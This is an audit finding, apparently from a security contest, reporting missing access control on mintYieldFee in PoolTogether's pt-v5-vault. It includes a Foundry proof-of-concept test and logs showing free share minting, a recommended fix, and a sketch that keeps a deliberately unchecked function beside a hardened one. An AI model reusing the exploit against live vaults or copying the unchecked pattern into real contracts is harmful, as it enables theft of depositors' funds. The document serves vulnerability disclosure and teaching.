Lines of code
https://github.com/GenerationSoftware/pt-v5-vault/blob/b1deb5d494c25f885c34c83f014c8a855c5e2749/src/Vault.sol#L394-L402

Vulnerability details

Impact
Everybody can call the mintYieldFee function in the Vault whenever there is _yieldFeeTotalSupply available and mint those shares to themselves for free, which later results in stealing funds from the Vault. (If this is the desired behaviour, which it shouldn't be based on the docs, the function can still be front-run, resulting in a malicious actor minting the shares for free.)

Proof of Concept
Everybody can call the mintYieldFee function in the Vault when there is _yieldFeeTotalSupply, which is increased in the liquidate function at https://github.com/GenerationSoftware/pt-v5-vault/blob/b1deb5d494c25f885c34c83f014c8a855c5e2749/src/Vault.sol#L550-L587. The liquidator is out of scope for this contest, which is why _yieldFeeTotalSupply was increased manually. Example: after executing liquidate we have _yieldFeeTotalSupply = 5 * 1e9;

```solidity
function testMintYieldFee() public {
    vault.setYieldFeeRecipient(alice);
    // vault._increaseYieldFeeBalance(5 * 1e9); // <== simulates the result of a liquidate() call
    vm.startPrank(alice);
    console.log('Balance of bob before: ', vault.balanceOf(bob));
    console.log('Yield fee total supply: ', vault.yieldFeeTotalSupply());
    console.log('Yield Fee Recipient: ', vault.yieldFeeRecipient());
    console.log('Bob address: ', bob);
    vault.mintYieldFee(5000000000, bob);
    console.log('Yield fee total after: ', vault.yieldFeeTotalSupply());
    console.log('Balance of bob after: ', vault.balanceOf(bob));
    console.log('Balance of alice after: ', vault.balanceOf(alice));
    vm.stopPrank();
}
```

The result will be:

```
Logs:
  Balance of bob before: 0
  Yield fee total supply: 5000000000
  Yield Fee Recipient: 0xBf0b5A4099F0bf6c8bC4252eBeC548Bae95602Ea
  Bob address: 0x4dBa461cA9342F4A6Cf942aBd7eacf8AE259108C
  Yield fee total after: 0
  Balance of bob after: 5000000000
  Balance of alice after: 0
```

Tools Used
Manual Review

Recommended Mitigation Steps
Add a modifier to the mintYieldFee function that requires the caller (or the receiver) to be the configured yieldFeeRecipient.

Assessed type
Access Control
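To make the recommended mitigation concrete, here is an added, self-contained sketch (not pt-v5-vault's code) that isolates the yield-fee minting path and places the unchecked shape described above beside a hardened version gated on the caller; the contract, modifier and error names are assumed for illustration, and only the storage names mirror the report.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.19;

/// Minimal vault sketch (constructed for this note, not the audited Vault.sol).
contract YieldFeeVaultSketch {
    uint256 internal _yieldFeeTotalSupply;       // fee shares accrued by liquidate()
    address internal _yieldFeeRecipient;         // who is entitled to those shares
    mapping(address => uint256) public balanceOf;

    error YieldFeeGTAvailable(uint256 requested, uint256 available);
    error CallerNotYieldFeeRecipient(address caller, address recipient);

    constructor(address yieldFeeRecipient_) {
        _yieldFeeRecipient = yieldFeeRecipient_;
    }

    /// Access-control gate the report asks for. Checking msg.sender (rather than
    /// only the receiver) also closes the front-running variant, because no one
    /// but the recipient can trigger the mint at all.
    modifier onlyYieldFeeRecipient() {
        if (msg.sender != _yieldFeeRecipient) {
            revert CallerNotYieldFeeRecipient(msg.sender, _yieldFeeRecipient);
        }
        _;
    }

    /// UNCHECKED shape from the finding: any account may move the accrued fee
    /// shares to an address of its choosing. Kept only for side-by-side comparison.
    function mintYieldFeeUnchecked(uint256 shares, address recipient) external {
        _mintYieldFee(shares, recipient);
    }

    /// HARDENED: identical accounting, but callable by the yield fee recipient only.
    function mintYieldFee(uint256 shares, address recipient)
        external
        onlyYieldFeeRecipient
    {
        _mintYieldFee(shares, recipient);
    }

    function _mintYieldFee(uint256 shares, address recipient) internal {
        uint256 available = _yieldFeeTotalSupply;
        if (shares > available) revert YieldFeeGTAvailable(shares, available);
        _yieldFeeTotalSupply = available - shares;  // effects before any interaction
        balanceOf[recipient] += shares;
    }
}
```

In a Foundry test, a `vm.expectRevert(abi.encodeWithSelector(YieldFeeVaultSketch.CallerNotYieldFeeRecipient.selector, attacker, recipient))` before a call from any non-recipient address verifies the gate, while the same call from the recipient still succeeds.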